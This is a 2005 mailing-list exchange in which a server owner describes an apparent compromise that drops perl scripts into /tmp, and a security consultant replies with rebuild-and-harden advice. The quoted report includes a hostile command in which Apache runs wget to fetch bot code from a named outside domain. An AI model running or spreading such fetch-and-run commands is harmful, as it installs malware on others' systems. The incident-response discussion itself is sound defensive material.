On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx <paul@xxxxxxxxxxxxxxxxxxx> wrote: > Apparently someone has hacked into my webserver. And is installing perl > scripts into he /tmp/ directory. There usually named .linuxday* or > .cinta* and a few other names as well. > > >From what I can tell something is causing apache to run a command like "sh > wget bot.linuxday.com.br -O {the above mentioned files are than listed}" > > sometimes the site is worm.linuxday.com.br > > I'm curious if anyone has heard about this before. I'm currently running > Fedora 1 with all the latests security patches. The only way to ensure your system is clean, and likely to remain clean, is to: 1. Do a bare metal install 2. Change all passwords to new strong passwords 3. Disable cleartext services, ftp, telnet, rsh, etc. 4. Disable root remote login (use su or sudo) 5. Restore your uncompromised data 6. etc. I had to do this for a client and the next 3 days the intruder tried to get back in. -- Leonard Isham, CISSP Ostendo non ostento.